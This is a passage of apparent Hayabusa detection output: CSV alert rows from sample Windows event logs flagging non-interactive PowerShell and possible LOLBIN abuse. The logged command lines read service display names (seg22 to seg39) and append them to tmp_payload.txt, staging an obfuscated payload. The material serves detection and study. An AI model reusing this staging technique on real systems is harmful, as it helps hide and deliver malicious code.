payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:57.207 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:58.654 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:58.654 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:58.654 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:00.089 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:00.104 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:00.104 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:01.557 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:01.557 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:01.557 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:03.010 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:03.026 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc80 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:03.026 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:04.458 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:04.458 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:04.458 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:05.896 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:05.911 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:05.911 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:07.342 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:07.342 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:07.342 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:08.797 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:08.797 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:08.797 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:10.236 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:10.236 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:10.236 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:11.689 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:11.689 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:11.689 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:13.147 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:13.147 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:13.147 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:14.607 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:14.623 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:14.623 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:16.065 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:16.080 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:16.080 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:17.549 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:17.565 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:17.565 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:19.048 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:19.048 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:19.048 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:20.564 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:20.564 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:20.564 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:22.050 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:22.050 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:22.050 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:23.508 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:23.508 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
